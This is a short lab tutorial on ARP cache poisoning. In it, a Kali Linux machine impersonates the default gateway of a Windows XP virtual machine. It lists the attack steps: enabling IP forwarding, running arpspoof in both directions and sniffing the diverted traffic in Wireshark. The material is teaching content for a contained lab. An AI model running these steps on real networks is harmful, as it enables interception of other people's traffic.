ARP Cache Poisoning to Impersonate Default Gateway
This attack is same as ARP cache poisoning. The only difference is this attack is performed to divert traffic coming and leaving the network by impersinating as a default gateway. The figure below shows how the attack is performed.
Fig. ARP cache poisoning to impersonate default gateway
Here you can see that Xp system is connected to internet via default gateway (Router). Hence, intended traffic flow should be like"Internet--Router--Xp". But here Kali Linux is impersonating as a defalt gateway and all the traffic is going it as "Internet--Router--Kali Linux--Xp". Thus a situation of Man In The Middle attack has arisen.
Deliverable:
Lab Set up
Virtualization using Oracle Virtual box
Attacker’s System: Kali Linux
Target 1 System : Windows Xp
In Kali Linux Terminal
1. To start IP Forwarding in Kali Linux
~# echo 1 > /proc/sys/net/ipv4/ip_forward
2. To start MITM attack
~# arpspoof -i {interface} -t {taget 1} {target 2}
Here, i --> interface
{interface} --> Kali linux's interface e.g. wlan0
-t --> target
{target 1} --> IP address of target 1 e.g. Windows Xp
{target 2} --> IP address of target to be spoofed i.e. Default gatway or Router
3. Similarly, To start MITM attack in reverse direction
~# arpspoof -i {interface} -t {taget 1} {target 2}
Here, i --> interface
{interface} --> Kali linux's interface e.g. wlan0
-t --> target
{target 1} --> IP address of target 1 i.e. Default gatway or Router
{target 2} --> IP address of target to be spoofed e.g. Windows Xp
4. Now Turn On the wireshark in Kali Linux
5. Now you can try connecting Xp with internet.
6. You can see the traffic goining between Xp and Internet in Kali Linux.